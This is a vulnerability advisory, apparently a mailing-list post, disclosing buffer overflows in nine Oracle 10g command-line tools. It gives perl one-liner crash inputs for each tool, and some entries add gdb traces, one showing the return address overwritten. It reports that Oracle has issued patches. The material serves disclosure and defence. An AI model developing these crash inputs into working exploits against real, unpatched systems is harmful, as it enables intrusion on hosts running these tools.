<<< Date Index >>>     <<< Thread Index >>>

Various Buffer Overflows in Oracle 10g Tools



---------------------------------------------------------------------------
           Various Buffer Overflows in Oracle 10g Tools
---------------------------------------------------------------------------

Author: Jose Antonio Coret (Joxean Koret)
Date: 2004, 2005
Location: Basque Country

---------------------------------------------------------------------------

Affected software description:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Oracle10g - Version 10.1.0.3.0

Web : http://www.oracle.com

---------------------------------------------------------------------------

Vulnerability List:
~~~~~~~~~~~~~~~~~~~

A.- Oracle XML Developers Kit 10.1.0.3.0 - Production
B.- Kerberos Utilities: Version 10.1.0.3.0 - Production
C.- Configuration tool for Oracle Cluster Registry
D.- NMUCT Program
E.- MAPSGA - An utility to dump the SGA
F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production
G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 -
Production
H.- IMPDP y EXPDP: Release 10.1.0.3.0 - Production
I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00


Vulnerabilities:
~~~~~~~~~~~~~~~~

A.- Oracle XML Developers Kit 10.1.0.3.0 - Production

A1. BOF in stylesheet argument

Oracle10g Database Servers XSL processor tool called XSL is vulnerable
to buffer overflows.
This may allow to run arbitrary code.

A2. Samples

joxean@nemobox:/data/oracle/bin$ ./xsl -B a `perl -e 'print "a"x2272;'`
oracle
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./xsl -f `perl -e 'print "a"x2272;'`
oracle
Segmentation fault

NOTE: Argument must be more than 2272 character long.

joxean@nemobox:/data/oracle/bin$ gdb ./xsl
(bla, bla, bla...)
This GDB was configured as "i386-linux"...Using host libthread_db
library "/lib/libthread_db.so.1".

(gdb) run -B a `perl -e 'print "a"x2272;'` oracle
Starting program: /data/oracle/bin/xsl -B a `perl -e 'print "a"x2272;'`
oracle
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 8457)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 8457)]
0x61616161 in ?? ()
(gdb) print $ebp
$1 = (void *) 0x61616161
(gdb) print $ebp+4
$2 = (void *) 0x61616165
(gdb) quit
The program is running.  Exit anyway? (y or n) y
joxean@nemobox:/data/oracle/bin$

We have been overwrite the return address with 0x61616161, the 'a'
character


B.- Kerberos Utilities: Version 10.1.0.3.0 - Production

B1. BOF in cachename parameter

The Oracle10g Database Server Kerberos Utilities are vulnerables to
buffer overflows. This may allow
to run arbitrary code.

B2. Samples

joxean@nemobox:/data/oracle/bin$ ./oklist -c `perl -e 'print "a"x300;'`
Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on
11-NOV-2004 18:52:28
Copyright (c) 1996, 2002 Oracle.  All rights reserved.

Segmentation fault

joxean@nemobox:/data/oracle/bin$ ./okdstry -c `perl -e 'print
"x"x6000;'`
Kerberos Utilities for Linux: Version 10.1.0.3.0 - Production on
11-NOV-2004 18:59:59
Copyright (c) 1996, 2002 Oracle.  All rights reserved.

Segmentation fault


C.- Configuration tool for Oracle Cluster Registry

C1. Upgrade argument Buffer Overflow

The Oracle10g Database Server OCRCONFIG tool is vulnerable to buffer
overflows. This may allow to 
run arbitrary code.

C2. Sample

joxean@nemobox:/data/oracle/bin$ ./ocrconfig  `perl -e 'print
"a"x6000;'`
Segmentation fault


D.- NMUCT Program

D1. NMUCT???

I don't known for what purposes serves this Oracle10g tool (?) but this
is vulnerable to buffer
overflows (any parameter!).

D1. Samples

joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'`
`perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print
"a"x6000;'` `perl -e 'print "a"x6000;'` `perl -e 'print "a"x6000;'`
Now in main ....
Segmentation fault

Next tests : 

joxean@nemobox:/data/oracle/bin$ ./nmuct a a a a `perl -e 'print
"a"x6000;'` a
Now in main ....
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./nmuct a a a `perl -e 'print
"a"x6000;'` a a
Now in main ....
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./nmuct a a `perl -e 'print "a"x6000;'`
a a a
Now in main ....
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./nmuct a `perl -e 'print "a"x6000;'` a
a a a
Now in main ....
Segmentation fault
joxean@nemobox:/data/oracle/bin$ ./nmuct `perl -e 'print "a"x6000;'` a a
a a a
Now in main ....
Segmentation fault

Almost any argument in this program is vulnerable to BOFs


E.- MAPSGA - An utility to dump the SGA

E1. BOF at the first argument

The Oracle10g Database Server MAPSGA tool is vulnerable to buffer
overflows. This may allow
to run arbitrary code.


E2. Sample(s)

joxean@nemobox:/data/oracle/bin$ ./mapsga `perl -e 'print "a"x60000;'`
Segmentation fault

joxean@nemobox:/data/oracle/bin$ gdb mapsga
(more bla, bla, bla...)
This GDB was configured as "i386-linux"...Using host libthread_db
library "/lib/libthread_db.so.1".

(gdb) run `perl -e 'print "x"x6000;'`
Starting program: /data/oracle/bin/mapsga `perl -e 'print "x"x6000;'`
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 28581)]

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 28581)]
0x41044390 in getenv () from /lib/libc.so.6
(gdb) print $ebp
$1 = (void *) 0xbfffd9f4
(gdb) print $ebp+4
$2 = (void *) 0xbfffd9f8
(gdb) quit
The program is running.  Exit anyway? (y or n) y


F.- NLS Data Installation Utility: Version 10.1.0.3.0 - Production

F1. Another BOF

The Oracle10g Database Server NLS Data Installation Utility is
vulnerable to buffer overflows. This
may allow to run arbitrary code.

F2. Samples

joxean@nemobox:/data/oracle/bin$ ./lxinst `perl -e 'print "x"x6000;'`

NLS Data Installation Utility: Version 10.1.0.3.0 - Production
Copyright (c) Oracle 1993, 2004.  All rights reserved.

CORE    10.1.0.3.0      Production

Segmentation fault

joxean@nemobox:/data/oracle/bin$ gdb lxinst
(And more bla, bla, bla...)
This GDB was configured as "i386-linux"...Using host libthread_db
library "/lib/libthread_db.so.1".

(gdb) run `perl -e 'print "x"x6000;'`
Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x6000;'`
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 29664)]

NLS Data Installation Utility: Version 10.1.0.3.0 - Production

Copyright (c) Oracle 1993, 2004.  All rights reserved.

CORE    10.1.0.3.0      Production


Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 29664)]
0x4109045d in mempcpy () from /lib/libc.so.6
(gdb) run `perl -e 'print "x"x60000;'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /data/oracle/bin/lxinst `perl -e 'print "x"x60000;'`
[Thread debugging using libthread_db enabled]
[New Thread 16384 (LWP 29696)]

NLS Data Installation Utility: Version 10.1.0.3.0 - Production

Copyright (c) Oracle 1993, 2004.  All rights reserved.

CORE    10.1.0.3.0      Production


Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 16384 (LWP 29696)]
0x4109045d in mempcpy () from /lib/libc.so.6


G.- NLS Binary Message File Generation Utility: Version 10.1.0.3.0 -
Production

G1. Another BOF :)

The Oracle10g NLS Binary Message File Generation Utility tool is
vulnerable to buffer overflows.
This may allow to run arbitrary code.

G2. Samples

joxean@nemobox:/data/oracle/bin$ ./lmsgen `perl -e 'print "x"x6000;'`
`perl -e 'print "x"x6000;'` `perl -e 'print "x"x6000;'`

NLS Binary Message File Generation Utility: Version 10.1.0.3.0 -
Production

Copyright (c) Oracle 1979, 2004.  All rights reserved.

CORE    10.1.0.3.0      Production

Input file name too long:
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
(...)
Can't open message file
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.
Incorrect number of arguments specified!

Syntax:
LMSGEN <text file> <product> <facility> [language] [-i indir] [-o
outdir]

Where <text file> is a message text file
      <product>   the name of the product
      <facility>  the name of the facility
      [language]  optional message language in
                  <language>_<territory>.<character set> format
                  This is required if message file is not tagged
properly
                  with language
      [-i indir]  optional directory where to locate the text file
      [-o outdir] optional directory where to put the generated binary
file.
Segmentation fault

Another easy test: lmsgen `perl -e 'print "x"x6000;'` a a


H.- IMPDP y EXPDP: Release 10.1.0.3.0 - Production

H1. Buffer overflow in EXPDP and IMPDP tools

The Oracle10g Database Server Data Pump IMPORT and EXPORT tools (calleds
impdp and expdp) are
vulnerable to buffer overflows. This may allow code execution.

H2 Samples

joxean@nemobox:/data/oracle/bin$ ./impdp `perl -e 'print "a"x60000;'`
Segmentation fault

joxean@nemobox:/data/oracle/bin$ ./expdp `perl -e 'print "x"x5000;'`

Export: Release 10.1.0.3.0 - Production on Thursday, 11 November, 2004
20:27

Copyright (c) 2003, Oracle.  All rights reserved.
Segmentation fault


I.- Genezi Client Shared Library 32-bit - 10.01.00.03.00

I1. Another BOF

The Oracle10g Database Server Genezi tool is vulnerable to buffer
overflows. This may allow to
run arbitrary code.

I2. Samples

joxean@nemobox:/data/oracle/bin$ ./genezi -c `perl -e 'print "x"x5000;'`
Segmentation fault


The fix:
~~~~~~~~

Oracle has been released patches for these and more issues. Patches are
available to dowwload
from the MetaLink site, at http://metalink.oracle.com

Disclaimer:
~~~~~~~~~~~

The information in this advisory and any of its demonstrations is
provided
"as is" without any warranty of any kind.

I am not liable for any direct or indirect damages caused as a result of
using the information or demonstrations provided in any part of this
advisory. 

---------------------------------------------------------------------------

Contact:
~~~~~~~~

        Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es



Attachment: signature.asc
Description: This is a digitally signed message part